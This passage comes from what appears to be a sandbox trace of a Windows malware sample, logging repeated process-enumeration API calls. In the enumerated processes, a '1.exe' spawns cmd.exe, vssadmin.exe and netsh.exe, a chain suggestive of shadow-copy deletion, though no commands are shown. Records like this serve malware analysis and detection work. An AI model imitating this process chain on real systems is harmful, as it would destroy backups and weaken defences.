th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.030] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0052.031] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0052.032] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0052.032] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0052.033] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0052.033] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0052.034] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0052.035] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0052.035] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0052.036] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0052.037] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0052.037] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0052.038] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0052.039] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0052.039] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0052.040] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0052.040] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0052.041] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0052.042] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0052.686] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0052.687] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0052.687] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0052.688] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0052.689] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0052.689] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0052.690] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0052.691] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0052.691] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0052.692] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0052.693] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0052.693] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0052.694] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0052.695] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0052.696] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0052.697] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0052.698] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0052.699] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0052.700] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0052.701] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0052.701] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0052.702] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0052.703] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.704] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.705] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0052.705] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0052.706] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.707] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0052.708] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0052.708] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.709] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.710] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0052.711] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.711] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0052.712] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0052.713] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 0 [0052.713] CloseHandle (hObject=0x330) returned 1 [0052.713] Sleep (dwMilliseconds=0x1f4) [0053.442] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x328 [0054.324] Process32FirstW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.325] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.326] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.327] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.327] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.328] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.329] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.329] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.330] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.331] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.331] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0054.332] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0054.333] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.333] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.334] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.336] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.337] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.339] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.340] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.341] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.341] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.342] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.343] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.344] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.344] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.346] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.346] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0054.347] Process32NextW (in: 